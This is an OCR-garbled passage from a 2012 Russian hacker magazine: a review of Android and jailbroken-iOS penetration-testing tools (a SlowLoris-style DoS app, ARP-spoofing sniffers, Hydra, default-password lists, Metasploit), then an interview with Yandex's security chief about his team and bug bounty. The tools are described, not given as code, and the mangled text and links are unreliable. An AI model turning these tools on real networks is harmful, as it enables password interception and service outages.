ботчиком не предусмотрен грубый перебор, а 
возможен только брутфорс по словарю. 




АпООБісІ 

Ы1.ІѴ/Р4ІУІІ. 

Наверняка ты слышал о такой программе 
вывода из строя веб-серверов, как ЗІоѵѵІогіз. 
Принцип ее действия — создать и удержи- 
вать максимальное количество подклю- 
чений судаленным веб-сервером, таким 
образом не давая подключиться к нему 
новым клиентам. Так вот, АпООБісІ — аналог 
БІоѵѵІогіз прямо в АпбгоісІ-девайсе! Грустно, 
но двухсот подключений зачастую достаточ- 
но, чтобы обеспечить нестабильную работу 
каждому четвертому веб-сайту на АрасЬе. 




РАЗНЫЕ ПОЛЕЗНОСТИ 



Епсосіе 

Ьі1.1ѵ/РіКѴр4 

При работе с многими веб-приложениями и 
анализе их логики достаточно часто встре- 
чаются данные, передаваемые в закоди- 
рованном виде, а именно Вазе64. Епсосіе 
поможеттебе раскодировать эти данные и 
посмотреть, что же именно в них хранится. 
Возможно, подставив кавычку, закодиро- 
вав их обратно в Вазе64 и подставив в ІІНЕ 
исследуемого сайта, ты получишь заветную 
ошибку выполнения запроса к базе данных. 




НехЕсШог 

ЬіІ.1ѵ/ІМ43Ысі 

Если нужен шестнадцатеричный редактор, 
то для АпсІгоісІ он тоже есть. С помощью 
НехЕсІіІогты сможешь редактировать 
любые файлы, в том числе и системные, 
если повысишь программе права до супер- 
пользователя. Отличная замена стандарт- 
ному редактору текстов, позволяющая с 
легкостью найти нужный фрагмент текста 
и изменить его. 




УДАЛЕННЫЙ ДОСТУП 




СоппесІВоІ 

ЬіЕІу/ЭаѴсШМ 

Получив доступ к удаленному хосту, нужно 
иметь возможность им воспользоваться. 

А для этого нужны клиенты. Начнем с 55Н, 
где стандартом де-факто уже является 
СоппесіВоЕ Помимо удобного интерфейса, 
предоставляет возможность организации 
защищенных туннелей через 55Н- 
подключения. 



РоскеіСІоисІ Ретоіе КОР/ѴЫС 

ЫШНзКгРЕ 

Полезная программа, позволяющая под- 
ключаться к удаленному рабочему столу 
через сервисы ПОР или ѴІ\ІС. Очень радует, 
что это два клиента в одном, нет необхо- 
димости использовать разные тулзы для 
ПОРиѴЫС. 




5ЫМР МІВ Вгоѵѵзег 

Ьі1.Іѵ/СМ_2РМ 

Специально написанный для АпсІгоісІ браузер 
МІВ, с помощью которого можно управлять 
сетевыми устройствами по протоколу 5ІММР. 
Сможет пригодиться для развития вектора 
атаки на различные маршрутизаторы, ведь 
стандартные соттипііу зігіпд (проще говоря, 
пароль для доступа) для управления через 
5ІММР еще никто не отменял. 






□ ымлн*# в 
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Не менее популярна среди разработчиков зесигііу-утилит платформа Ю5. Но если 
в случае с АпбгоісІ права гооі'а были нужны только для некоторых приложений, то 
на устройствах от Арріе джейлбрейк обязателен почти всегда. К счастью, даже для 
последней прошивки іДевайсов (5.1.1) уже есть тулза для джейл брейка. Вместе 
с полным доступом ты еще получаешь и альтернативный менеджер приложений 
Сусііа, в котором уже собраны многие утилиты. 




РАБОТА С СИСТЕМОЙ 



ІпІегсерІег-№ Ісопзоіе есііііопі 



МоЬіІеТегтіпаІ 

собе.доодІе.сот/р/тоЬіІеіегтіпаІ 

Первое, с чего хочется начать, — это 
установка терминала. По понятным при- 
чинам в стандартной поставке мобильной 
ОС его нет, но он нам понадобится, чтобы 
запускать консольные утилиты, о которых 
мы далее будем говорить. Лучшей реа- 
лизацией эмулятора терминала является 
МоЬіІеТегтіпаІ — он поддерживает сразу 
несколько терминалов, жесты для управ- 
ления (например, для передачи <СігІ + С>) и 
вообще впечатляет своей продуманностью. 



вопшкшйа 

□ОЕЗВЕШЕШа 

□□□ □ □□□ ° 



І55Н 

ЬіІ.Іѵ/бтиЬѵУ 

Еще один, более сложный вариант по- 
лучить доступ к консоли устройства — 
установить на нем 0реп55Н (это делается 
через Сусііа) и локально подключаться к 
нему через 55Н-клиент. Если использовать 
правильный клиент вроде ІБЗН, в котором 
изумительно реализовано управление с 
сенсорного экрана, — то ты из одного места 
сможешь работать с локальной консолью и 
удаленными хостами. 



Ліг V И.А1 




опопппиоап 

ЕШЕШЭСШЗДЭ 




ПЕРЕХВАТ ДАННЫХ 



РІГПІ & РІГПІ Рго 

собе.доодіе.сот/р/пітба-сіеѵ 

Теперь, когда доступ к консоли есть, можно 
попробовать утилиты. Начнем с Рігпі, 
первого полноценнного сниффера для І05. 
Конструктивно ограниченный модуль ѴѴі- 
Рі, встроенный в іУстройства, невозможно 
перевести в рготізсіоиз-режим, необходи- 
мый для нормального перехвата данных. 
Так что для сниффинга используется 
классический АРР-спуфинг, с помощью 
которого весь трафик пропускается через 
само устройство. Стандартная версия ути- 
литы запускается из консоли, однако есть 
более продвинутая версия — Рігпі Рго, 
которая может похвастаться графическим 
интерфейсом. Причем она умеет на лету 
парсить НТТР-трафик и даже автомати- 
чески вытаскивать оттуда интересные дан- 
ные (к примеру, логины-пароли), используя 
для этого регулярные выражения, которые 
задаются в настройках. 




зпііТзи 

Небезызвестный сниффер ІпІегсерІег-І\І6 
с недавнего времени имеет консольную 
версию, которая работает на ІОБ и АпбгоісІ. 

В ней уже реализован граббинг паролей, 
передаваемых по самым разным протоко- 
лам, перехват сообщений мессенджеров, 
а также воскрешение файлов из трафика. 
При этом доступны функции сканирования 
сети и качественный АВР Роізоп. Для работы 
необходимо предварительно установить 
через Сусііа пакет ІіЬрсар. Вся инструкция по 
запуску сводится к установке правильных 
прав: сЬтоб +х іпІегсерІег_іоз. Далее, если 
запустить сниффер без параметров, появит- 
ся понятный интерактивный интерфейс. 



ЕНегсар-КІС 

ІіЦр5://аіІІіиЬ.сот/ТІіеѴ\/огт/ЕЦегсар-М6 

Трудно поверить, но этот сложнейший 
инструмент для реализации МІТМ-атак все- 
таки портировали под Ю5. После колоссаль- 
ной работы получилось сделать полноцен- 
ный мобильный порт. Чтобы избавить себя 
оттанцев с бубном вокругзависимостей во 
время самостоятельной компиляции, лучше 
установить уже собранный пакет, используя 
Сусііа, предварительно добавив в качестве 
источника данных іЬеѵѵогт.аІІегѵізІа.огд/ 
сусііа. В комплекте идет и утилита еМегІод, 
которая помогает извлечь из собранного 
дампа трафика различного рода полезную 
информацию (к примеру, аккаунты к РТР). 






АНАЛИЗ БЕСПРОВОДНЫХ СЕТЕЙ 



ѴѴіРі Апаіуіег 

зііез.доодІе.сот/зіІе/ірЬопеѵѵТіапаІѵгег 

В старых версиях ІОБ умельцы запускали 
аігсгаск и могли ломать ѴѴЕР-ключ, но мы 
проверили: на новых устройствах програм- 
ма не работает. Поэтому для исследования 
ѴѴі-Рі нам придется довольствоваться только 
ѴѴі-Рі-сканерами. ѴѴіРі Апаіугег анализирует 
и отображает информацию обо всех доступ- 
ных 802.11 сетях вокруг, включая информа- 
цию о 55Ю, каналах, вендорах, МАС-адресах 
и типах шифрования. С такой программой 
легко найти физическое местоположение 
точки, если ты вдруг его забыл, и, например, 
посмотреть написанный ѴѴР5 РІІЧ, необходи- 
мый для подключения. 
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Боевой смартфон 



СЕТЕВЫЕ СКАНЕРЫ 



Зсапу 

ЬИ.Іѵ/ОРНХѴх 

Какой программой пользуется любой пен- 
тестер в любой точке планеты независимо 
от целей и задач? Сетевым сканером. 

И в случае с І05 это, скорее всего, будет 
мощнейший тулкит Бсапу. Благодаря 
набору встроенных утилит можно быстро 
получить подробную картину о сетевых 
устройствах и, к примеру, открытых пор- 
тах. Помимо этого пакет включает в себя 
утилиты тестирования сети, такие как ріпд, 
Ігасегоиіе, пзіоокир. 




Ріпд 

ЬИ.Іѵ/РдІМОѴЗ 

Впрочем, многие отдают предпочтение 
Ріпд'у. Сканер имеет достаточно про- 
стой и ограниченный функционал, но его 
вполне хватит для первого знакомства с 
сетью, скажем, кафетерия :). В результатах 
отображается информация о доступных 
сервисах на удаленных машинах, МАС- 
адреса и имена хостов, подключенных к 
сканируемой сети. 





Ыікіо 

сИ.пеі/пікіо2 

Казалось бы, про І\Шо все забыли, но по- 
чему? Ведь этот веб-сканер уязвимостей, 
написанный на скрипт-языке (а именно на 
РегІ], ты легко сможешь установить через 
Сусііа. А это значит, что ты без особого труда 
сможешь запустить его на своем джейл- 
брейкнутом устройстве из терминала. І\Шо с 
радостью предоставиттебе дополнительную 
информацию по испытуемому веб-ресурсу. 
Ктомуже ты своими руками можешь доба- 
вить в его базуданныхзнаний собственные 
сигнатуры для поиска. 





УДАЛЕННОЕ УПРАВЛЕНИЕ 

5ЫМР5сап 

ЬіІІѵ/ШКРЬт 

Многие сетевые устройства (в том числе 
дорогие роутеры] управляются по протоко- 
лу 5ЫМР. Эта утилита позволяет проска- 
нировать подсети на наличие доступных 
сервисов 5ЫМР с заранее известным 
значением соттипііу зігіпд (проще го- 
воря, стандартными паролями). Заметим, 
что поиск сервисов 5ЫМР со стандарт- 
ными соттипііу зігіпд (риЫіс/ргіѵаІе) в 
попытке получить доступ к управлению 
устройствами — неотъемлемая часть 
любого теста на проникновение наряду с 
идентификацией самого периметра и вы- 
явлением сервисов. 





Пар тоЬМе КйР / Пар тоЫІе ѴЫС 

ЬіІІѵ/ОрКІзІ 

Две утилиты от одного производите- 
ля предназначены для подключения к 
удаленному рабочему столу по протоколам 
РБР и ѴІМС. Подобных утилит в Арр Біоге 
много, но именно эти особенно удобны в 
использовании. 



ВОССТАНОВЛЕНИЕ ПАРОЛЕЙ 




Ич мШ Ы ^ V -Е.І 



есппспЕоэ 



Нусіга 

Ьі1.Іѵ/ЦЕКК7Х 

Легендарная программа, помогающая 
«вспомнить» пароль миллионам хакеров 
по всему миру, была портирована под ЮБ. 
Теперь прямо с іРЬопе'а возможен пере- 
бор паролей ктаким сервисам, как НТТР, 
РТР, Теіпеі, 55Н, 5МВ, ѴІМС, 5МТР, РОРЗ и 
многим другим. Правда, для более эффек- 
тивной атаки лучше запастись хорошими 
словарями для брутфорса. 




РавзМиІе 

Ьі11ѵ/РЬР2кб 

Всем не понаслышке известна такая уяз- 
вимость, как использование стандартных 
паролей. РаззМиІе представляет собой 
своего рода справочник, в котором собра- 
ны всевозможные стандартные логины и 
пароли для сетевых устройств. Они удобно 
разложены по названиям вендоров, про- 
дуктам и моделям, так что найти нужный 
не составит труда. 




ЭКСПЛУАТАЦИЯ УЯЗВИМОСТЕЙ 

МЕТА5РЮІТ 

ѵѵѵѵѵѵ.теіазріоіі.сот 

Сложно представить себе более хакерскую 
утилиту, нежели Меіазріоіі, — и именно 
она завершает наш сегодняшний обзор. 

Меіазріоіі — это пакет разнообразных 
инструментов, основная задача которого 
заключается в эксплуатации уязвимостей в 
программном обеспечении. Представь: око- 
ло 1000 надежных, проверенных и необходи- 
мых в повседневной жизни пентестера экс- 
плойтов — прямо на смартфоне! С помощью 
такого инструмента реально можно обосно- 
ваться в любой сети. Меіазріоіі позволяет не 
только эксплуатировать бреши в серверных 
приложениях — доступны также инстру- 
менты для атак на клиентские приложения 
(например, через модуль Вгоѵѵзег Аиіорѵѵп, 
когда в трафик клиентов вставляется боевая 
нагрузка). Мобильной версии тулкита не су- 
ществует, однако на Арріе-устройство можно 
установить стандартный пакет, воспользо- 
вавшись подробной инструкцией 
( Ьіиу/теіазріоіі іоз ). 
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Беседовал Степан Ильин 



АНТОН КАРПОВ 



ПОКА ИСТОРИЯ 
НЕЗНАЕТ ПРИМЕРОВ 
ВЗЛОМАЯНДЕКСА 



Карьера Антона Карпова, СІ50 (СЫеІ 
ІгТогтаІіоп Зесигііу (Шісег) в Яндексе, 
а в прошлом — автора многих крутых 
статей в «Хакере», наглядно иллюстри- 
рует утверждение, что для успеха в ІТ 
недостаточно быть хорошим специали- 
стом — важно быть яркой личностью. 
Антон любезно согласился рассказать 
читателям ][ об устройстве внутренней 
кухни отдела безопасности Яндекса и 
своем пути к успеху в одной из круп- 
нейших европейских ІТ-компаний. 



Я не хочу фантазировать на тему, что будет, если завтра 
какой-нибудь сервис Яндекса взломают и выложат в откры- 
тый доступ приватные данные пользователей (хотя, конечно, 
я знаю, что мы будем делать в этом случае). Но лучше вместо 
озвучивания фантазий я буду работать над тем, чтобы они так 
фантазиями и оставались. Мы чувствуем постоянную ответ- 
ственность за сохранность данных наших пользователей (а 
пользователи — это главное, что у нас есть). Это заставляет 
меня очень серьезно относиться к работе и заниматься тем, 
чем мы занимаемся. 

Я пришел в Яндекс в июне прошлого года. Приступив к 
работе, понял, что главное для СІ50 — выработать стратегию и 
планомерно двигаться кее реализации. Например, понятно, что 
в компании, которая занимается интернетом и веб-продуктами, 
продуктовая и веб-безопасность будут важнее всего остального 
и выйдут на первое место. Также следует правильно расставить 
акценты, чтобы понять важные с точки зрения ИБ вещи на теку- 
щем уровне зрелости компании. Нечто важное сегодня, может, 
вовсе не будет иметь значения через пять лет. На каждом этапе 
развития и зрелости важны какие-то свои вещи. 

Служба информационной безопасности в Яндексе суще- 
ствует давно. Но изначально она занималась безопасностью 
в том виде, в котором она присутствует почти во всех компа- 
ниях: раздача сотрудникам доступа во внутренние системы, 



управление файрволом, разработка внутренних политик 
безопасности. Я назвал бы это операционной безопас- 
ностью. Но полная «перезагрузка», с пониманием того, 
какой должна быть безопасность применительно к 
продуктам и пользователям, в Яндексе случилась всего 
несколько лет назад. 

Сейчас, помимо операционной безопасности, мы 
выделяем два основных направления — продуктовая 
безопасность и инфраструктурная безопасность. Есть 
люди, которые занимаются внутренними процессами, 
безопасностью внутренней инфраструктуры и всего, 
что с этим связано. И есть команда, которая занимается 
безопасностью продуктов. В первую очередь это наши 
веб-сервисы, мобильные приложения и вообще все 
новое, что мы делаем или добавляем. 

В службе ИБ девять человек. Команда продукто- 
вой безопасности — три человека. Инфраструктурная 
безопасность — двое, операционная — еще трое. Все 
ребята, которые сейчас работают в Яндексе в службе 
ИБ, — это лучшие специалисты в своих областях на 
российской сцене. 

Мы в основном используем собственные наработки 
или доработанные продукты из мира Ореп Боигсе. Это 

не значит, что мы вообще не смотрим в сторону вендо- 



024 



ХАКЕР 10/165/2012 





ФАКТЫ 



Окончил СПбГПУ 
(«Политех»), кафедру 
информационной 
безопасности. 



Работал пентестером 
вОідііаІБесигііуиИБ- 
менеджером в крупном 
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ров, мы применяем некоторые инструменты 
сторонних компаний в наших ИБ-процессах. 

Но в большинстве случаев мы приходим к 
выводу, что свое решение, разработанное или 
«допиленное» внутри Яндекса, удовлетворя- 
ет нашим требованиям лучше, чем решение 
от вендора. Такова специфика компании: 
инфраструктура и ИТ-процессы Яндекса 
очень специфичны, где-то даже уникальны, а 
значит, для обеспечения их защиты требуются 
специфичные решения. 

Некоторые из наших доработок мы отдаем 
обратно в Ореп Боигсе проекты. Например, 
наш внутренний сканер уязвимости веб- 
приложений основан на известном открытом 
фреймворке ѵѵЗаТ который мы доработали для 
регулярного использования в больших проек- 
тах и кастомизировали под сервисы Яндекса. 
Тарас Иващенко (охсІеЛ, который занимается в 
Яндексе продуктовой безопасностью, — один 
из контрибьюторов проекта ѵѵЗаТ 

У нас есть системы мониторинга, анализа 
логов, система обнаружения вторжения. 
Скажем так — у нас есть достаточное количе- 
ство радаров, чтобы мониторить возможные 
нарушения безопасности сервисов Яндекса. 

Яндекс — прекрасный пример того, что 
внутренняя безопасность должна быть про 
людей, а не только про файрволы, технические 
меры и ИБ-контроли. Ведь люди в массе своей 
не настроены на сознательное нарушение 
запретов. Они склонны игнорировать или об- 
ходить контроли, только если те мешаютудоб- 
ству их работы. Идеальная безопасность — это 
когда все устроено не только безопасно, но и 
по-человечески. 

В Яндексе работает удивительный народ, 
который понимает проблематику. Если пред- 
ложить им решение, которое они сочтут адек- 
ватным для увеличения безопасности, — они 
его примут. Когда я только пришел в Яндекс, 
приятным сюрпризом для меня стало то, что 
люди (программисты и тем более администра- 
торы) в массе своей понимают проблемы ИБ, 
просто каждый на своем уровне. В Яндексе 
отсутствует распространенное пренебрежение 
к ИБ, типа: «Я делаю свою работу — а вы мне 
мешаете, отстаньте от меня». 

Служба информационной безопасности 
Яндекса взаимодействует почти со всеми 
отделами и департаментами, ведь ИБ — это 
вертикальная структура, охватывающая всю 
компанию. Чтобы с тобой советовались, тебя 
слушали и видели в тебе помощника, необхо- 
димо создать правильную культуру. Культура 
информационной безопасности в Яндексе — 
это не «запретить, оторвать, не пустить, за- 
крыть». Это «оценить, посоветовать, пояснить, 
поговорить и предложить решение». 

Конечно, мы уже сделали многое, и мно- 
гое нам еще предстоит. Сейчас мы выводим 
то, что было заложено еще до меня, на новый 
уровень. Строим процессы, покрывающие 
все новые продукты компании и изменения в 
ИТ-инфраструктуре, стараемся сделать так, 
чтобы тестирование на безопасность стало 
еще качественнее, чтобы функциональ- 



ное тестирование всегда включало в себя 
тестирование безопасности, разрабатываем 
механизмы 5БІ_С и так далее. Операционные 
процессы ИБ оптимизируем и автоматизи- 
руем, делаем так, чтобы рутинные операции 
занимали минимум времени и при этом были 
полностью контролируемы. 

Предмет особой гордости в области опе- 
рационной безопасности — своя собственная 
ШМ (Шепіііу Мападетепі) система корпо- 
ративного уровня, полностью внутренняя 
разработка компании. Она охватывает все 
важнейшие внутренние системы в Яндексе, 
позволяет гибко управлять правилами доступа 
согласно регламентам и с использованием 550 
(5іпдІе 5ідп-0п) и при этом предоставляет пол- 
ную отчетность действий. Могу с уверенностью 
сказать, что мало у кого успешно внедрены и 
работают подобные системы. Это показатель 
хорошего уровня зрелости. 

Есть такая шутка: ну да, я работаю всего 
час — с 10 до 11. На самом деле — с 10 утра до 
11 вечера, плюс-минус час в любую сторону. 
Нередко бывает, что время «съезжает» и я 
могу оставаться на работе и после полуночи, 
как придется. Часто страдаю от этого — позд- 
но возвращаюсь с работы и даже не успеваю 
купить бутылочку вина на вечер :). 

ХАКЕРСКИЙ ЛИФТ 

Нельзя сказать, что я жил вместе с компьюте- 
ром с самого детства. У меня нет «классическо- 
го» хакерского прошлого: я не программировал 
под Спектрум и не ходил на работу к родителям, 
чтобы в большой лаборатории поиграть в «Арка- 
ноид» на стареньком мейнфрейме. С компами я 
был «на вы» где-то до старших классов школы. 
Дело в том, что изначально я учился в гума- 
нитарной школе, писал рассказы, стихи — в 
общем, видел себя гуманитарием. Потом все 
поменялось, и в старших классах я ушел в 
физико-математическую школу, таким образом 
себя «переломив». 



Мой бывший коллега Саша Поляков говорил, 
что для него вся безопасность началась с жур- 
нала «Хакер». У меня было то же самое, только 
все случилось на несколько лет раньше. 

Когда я учился в 10-м классе, я сидел в 
НТМЬчате газеты «Спорт-экспресс», потому 
как тогда очень увлекался футболом. Мой 
одноклассник, который гораздо больше меня 
интересовался компами, поломал этот чат, 
сделав какие-то простейшие вещи. Затем он 
написал об этом статью в журнал «Хакер» (ка- 
жется, она называлась: «Как я ломал ІпіюАгЫ. 
Я даже не знал, что есть такой журнал, но 
заинтересовался и купил его. 

Мне подумалось: это ведь было бы очень 
круто — написать в такой журнал. В то время 
я еще не понимал и половины написанного, но 
живо начал интересоваться всем этим. 

Тогда я понял, что компьютеры можно 
хакать, а хакать — это прикольно. Было такое 
время, когда мне не хотелось ничего, только 
сидеть дома за компьютером. Лето и зиму я 
проводил в интернете, и тогда же началось мое 
общение с тусовкой из «Хакера». Получается, 
что мое айтишное «становление» и развитие 
журнала шло практически одновременно. 

Параллельно с этим я поступил в питер- 
ский Политех. Точнее — на кафедру информа- 
ционной безопасности, старейшую в Петербур- 
ге. Надо ли говорить, что тогда я уже понимал, 
что хочу именно туда. 

В 2000 или в 2001 году открылся новый 
сайт «Хакера», и туда набирали авторов 
статей. Я написал Лёне Боголюбову о том, 
что хочу писать, он ответил: «о'кей, пиши». 

Я стал писать, а Лёня платил мне за это 
какие-то деньги, но это все-таки был сайт, не 
журнал. Авторы и костяк команды на сайте и 
в журнале тогда были разные. Тем не менее 
мы все вместе общались в ІРС, на русском 
ОаІЫеБ Там же часто зависал и тогдашний 
главред журнала — Сергей Покровский 
(51№ег). 
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И вот как-то вечером он сказал мне прямо 
там # при всех: «А почему ты пишешь на сайт? 
Пиши в журнал». Тогда команда журнала на- 
зывалась Х-Сгеѵѵ, и предложение было в духе: 
«я приглашаю тебя в Х-Сгеѵѵ». Конечно же, я 
подумал, что это круто и вообще охренеть :). 

Так я начал писать в журнал. 

Стоит сказать, что я никогда толком не 
пользовался ѴѴіпсІоѵѵз. Не потому, что где-то 
прочитал, что І_іпих — это круто; просто так 
сложилось. Я поставил себе сначала Реб Наі, 
потом немного поигрался с Мапбгаке, а затем 
остановил свой выбор на БІаскѵѵаге. ЗІаскѵѵаге 
мне очень понравился, так как был простым, 
понятным дистрибутивом, не перегружен- 
ным «графической дружелюбностью». Как-то 
раз кто-то сказал мне, что РгееВЗй — это по 
идеологии то же самое, что БІаскѵѵаге, только 
лучше. Тогда я поставил РгееВБй и с тех пор 
являюсь апологетом именно В50-систем. 

В первой половине «нулевых» я активно 
писал в Хакер о тех вещах, которыми тогда 
увлекался. В частности, очень много я писал 
как раз про 16 N IX. 

Все остальное закрутилось как-то само 
собой. Например, еще во времена студен- 
чества я купил себе ноутбук, в котором был 
ѴѴі-Рі-модуль, и подумал, что безопасность 
беспроводных сетей — это очень интересная 
тема. Тогда в Москве и Питере уже появля- 
лись публичные точки доступа, был известен 
термин ѵѵагбгіѵіпд и так далее. Но это было 
совсем новой областью, серьезно ею занима- 
лись буквально несколько человек. Помню, 
различные исследовательские вещи вокруг 
ѴѴі-Рі тогда вели Павел ХЫР из ІІкР-Теат и 
Сергей Гордейчик, известные персонажи в 
ИБ-тусовке. 

Тогда я сделал небольшой проектик — 
беспроводные сети Петербурга. Это было 
еще до появления проектов вроде ѵѵагбгіѵег. 
щ, а легендарный ѵѵідіе.пеі только появился. Я 
создал карту Питера с обнаруженными точками 
доступа — она была одной из первых в своем 
роде. Это был 2003-2004 год, мы много ездили 
по городу на машине с внешней антенной, ноут- 
буками и 6Р5-приемником; потом я выкладывал 
найденные точки на своем сайте и рисовал их на 
карте с помощью АРІ Соодіе Марз. 

ПУТЬ К СІ50 

Я продолжал писать в журнал, учился в ин- 
ституте и одновременно работал в компании, 
которая занималась информационной безо- 
пасностью и РКІ (цифровыми сертификатами). 

Я выполнял там технические задачи, был не 
только безопасником, но и админом, и мне это 
нравилось. Но когда я окончил институт, то 
понял, что нужно расти в одном направлении. 
Тогда-то я и решил заниматься безопасностью 
профильно. Упорное круглосуточное задрот- 
ство последних 5-6 лет дало о себе знать — я 
накопил хороший уровень знаний. 

В те годы (да и, пожалуй, сейчас) в Питере, 
если ты хотел заниматься практической 
безопасностью, у тебя был только один 
вариант— Оідііаі Бесигііу. И я пришел в й5ес 



в 2007 году, хотя де-факто сотрудничал с ними 
еще за пару лет до этого. Мы занимались пен- 
тестами, одними из первых в России начали 
двигать РСІ 055. Соответственно, из простого 
«технаря» я стал профессиональным практи- 
кующим безопасником и аудитором. 

В Оідііаі Бесигііу я проработал около двух 
лет, активно занимался аудитом и тестами на 
проникновение, а также построением для заказ- 
чиков систем управления ИБ. Это позволило мне 
прокачать свои технические и пентестерские 
скиллы, получить представление о том, как ра- 
ботают ИБ- и ИТ-процессы в крупных компаниях. 
Но потом я стал понимать, что работа аудитором 
в маленькой компании, когда ты приезжаешь и 
занимаешься только пентестами и консалтингом 
(то есть работаешь снаружи), в какой-то момент 
наскучивает, — хочется попробовать подергать 
за ниточки изнутри. 

Мне захотелось поработать в компании, 
непосредственно обеспечивая ее безопас- 
ность, а не заниматься безопасностью за- 
казчиков. И тут как раз в 2009 году ко мне об- 
ратился рекрутер английского банка Вагсіауз, 
только пришедшего тогда в Россию. Они ис- 
кали кандидата в Москве. Нужно сказать, что 
в начале и середине «нулевых» я очень любил 
Москву, так как вся наша «хакерская» тусовка 
была там. Учился и думал: «вот закончу учебу и 
обязательно перееду в Москву». Но по иронии 
судьбы сложилось так, что к тому моменту, 



когда у меня наконец появилась возможность 
покинуть родной Питер и переехать работать в 
Москву, я ее разлюбил. И как только этот город 
стал меня раздражать, я туда переехал, как 
это часто и бывает с Москвой :). 

Безопасников-практиков, которые при 
этом разбираются в безопасности бизнес- 
процессов, не так много. Обычно это либо 
люди с упором на менеджмент, либо совсем 
технари. Мне повезло — я был и тем, и другим. 
Так я начал работать в «Барклайс банке» ме- 
неджером информационной безопасности. 

2009-2011 годы в банке сильно повлияли 
на мое развитие, но не только и не столько 
с технической стороны. Благодаря работе в 
Вагсіауз я получил шанс поездить и по- 
смотреть, как ИТ и ИБ работает в поистине 
глобальной компании (Вагсіауз представлен 
более чем в пяти десятках стран). 

В Англии я входил в международную 
команду пентестеров. Нас было пять человек, 
все выходцы из команд и компаний вроде 
Оідііаі Бесигііу, только английских, амери- 
канских, шведских. Нам вместе было очень 
весело, я до сих пор дружу почти со всеми 
парнями оттуда. 

В 2011 году Вагсіауз решил продать свой 
бизнес в России. У меня было два варианта — 
найти другую работу в России, оставшись в 
Москве, или полностью перебраться в Англию. 
К тому моменту я успел полюбить Великобри- 



ЕСТЬ ТАКАЯ ШУТКА: НУ ДА, Я РАБОТАЮ 
ВСЕГО ЧАС — С 10 ДО 11. НА САМОМ ДЕЛЕ — 
С 10 УТРА ДО 11 ВЕЧЕРА, ПЛЮС-МИНУС ЧАС 
В ЛЮБУЮ СТОРОНУ 
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танию, английскую культуру и все, что с ней 
связано. Я серьезно раздумывал перебраться 
туда, и у меня уже была на руках деловая виза. 
Но в Англии мне пришлось бы продолжать 
работать на позиции пентестера — то есть 
во многом заниматься технической работой. 

А ктому времени весь интерес к техническому 
развитию я уже исчерпал. Это не значит, что 
мне более не интересны новые вещи, но это 
уже не такой экстаз, как десять лет назад. Так 
что я серьезно задумался, когда на горизонте 
появился Яндекс. 

Яндекс — компания очень специфическая. 

Они долго искали кандидата на позицию СІ50 
и долго думали. С одной стороны, им нужна 
была техническая грамотность (а средний уро- 
вень технической грамотности специалиста в 
Яндексе намного выше среднего уровня любой 
другой компании), но, с другой стороны, на 
позиции руководителя явно нужны не только 
технические знания, но и понимание «боль- 
шой картины», опыт построения процессов и 
управления ими. 

Мы пообщались с Яндексом, и в итоге я 
сделал непростой выбор, решив не пере- 
езжать. На то были и личные причины, но 
главное — мне действительно было интересно 
заняться безопасностью в такой большой 
компании. Кроме того, Яндекс — компания ай- 
тишников, что, безусловно, интереснее — ведь 
здесь люди менее формальны и технически 
более грамотны. К примеру, в банке ты можешь 
принять в приказном порядке некую полити- 
ку — и люди будут ее исполнять, независимо 
от ее содержания. 



Здесь же люди не формалисты, они адек- 
ватны. Если им кажется, что твое решение 
не имеет смысла, они как минимум будут его 
оспаривать, а как максимум — молча игно- 
рировать и обходить. Поэтому к людям здесь 
нужен подход. Но видимо, во мне проснулось 
изначальное чувство айтишника, я понял, что 
среди таких же айтишников, которые круглые 
сутки стучат по клавишам, я буду комфортно 
чувствовать себя в роли руководителя. 

До меня за безопасность в Яндексе от- 
вечал заместитель ІТ-директора, Владимир 
Иванов, который взял в руки лопату и заложил 
фундамент. Я в свою очередь привез кирпичи, 
план здания, схему и начал строить на фунда- 
менте осознанный дом. 

ОХОТА ЗА ОШИБКАМИ 

В этом сентябре мы запускаем постоянную 
программу поощрений за найденные уяз- 
вимости. Первый опыту нас был в прошлом 
году. В рамках конференции 2егоІ\ІідЬІ5, 
соорганизаторами которой мы выступаем, мы 
проводили «Месяц поиска уязвимостей». Мы 
не запустили бы эту программу на постоянной 
основе, если бы были неуверены в собствен- 
ных силах и общем уровне ИБ компании — но 
такая уверенность есть. Подробнее о про- 
грамме можно почитать на сотрапу.уапсіех.ги. 
Теперь мы платим деньги каждому, кто найдет 
уязвимость в сервисах Яндекса. 

Схема работы нашей программы, которую 
мы назвали «Охота за ошибками», такова: 
человек находит уязвимость и сообщает о 
ней нам, пообещав в течение двух месяцев не 




разглашать информацию. Мы, в свою оче- 
редь, обязуемся в течение нескольких дней 
ответить, принята ли его уязвимость. Если 
принята — то есть удовлетворяет заданным 
требованиям и ее не обнаружили ранее другие 
исследователи, — человеку выплачивают 
денежное вознаграждение. При этом тестиро- 
вание уязвимостей можно проводить только 
для своей учетной записи. Взламывать чужие 
учетные записи нельзя, а участие в конкурсе 
вовсе не означает нарушения закона. 

Приятно, что мы первыми из российских 
компаний запустили такую программу. Я не 
слышал, чтобы у кого-то из них было нечто 
подобное. 

Чем наша программа отличается от всех, 
в том числе и от аналогичной программы 
Ооодіе? Мы признаем, что не только веб- 
сервисы, но и мобильные приложения могут 
быть подвержены различным рискам безопас- 
ности. Поэтому наша программа их тоже 
охватывает. Мы начинаем с определенных 
денежных премий, которые, думаю, будем в 
дальнейшем повышать. Это будетуникальный 
для России опыт. 

Кстати, на 2егоІМід№5 была найдена 
серьезная уязвимость в нашей почте, из-за 
которой было можно частично просматривать 
некоторые чужие письма. Правда, ты не знал, 
чьи они, и мог видеть только первые три строч- 
ки. Это довольно интересная уязвимость, но 
мы не один раз все перепроверили и поняли, 
что злоумышленники ее не эксплуатировали. 

К тому же «раскрутить» ее для практического 
применения было почти нереально. 

Когда работаешь в большой компании, 
важно понимать, что уязвимости в системах 
будут всегда. Когда разрабатывается большое 
количество продуктов, найти все уязвимости 
сам ты не можешь физически. Поэтому мы 
благодарны всем исследователям, которые 
искали и будут искать у нас уязвимости. Мы не 
стесняемся признавать, что у нас что-то где-то 
может быть небезопасно. Не ошибается тот, 
кто ничего не делает. 

ВНУТРЕННЯЯ КУХНЯ 

Увы, на данный момент в отделе ИБ Яндекса 
нет открытых вакансий. Последний, на се- 
годняшний день, человек, которого мы взяли, 
вошел в группу продуктовой безопасности. 

Он работает в офисе Яндекса в Питере, хотя 
до сих пор все мы работали в одном кабинете 
в Москве. И наш новый коллега (кстати, до- 
вольно известный на российской ИБ-сцене 
человек) — первый для меня опыт распреде- 
ления команды по географическому признаку. 
Это очень важный опыт, ведь если ты хочешь 
создавать международную компанию, хочешь 
работать в такой компании, важно уметь об- 
щаться и достигать результата не только тогда, 
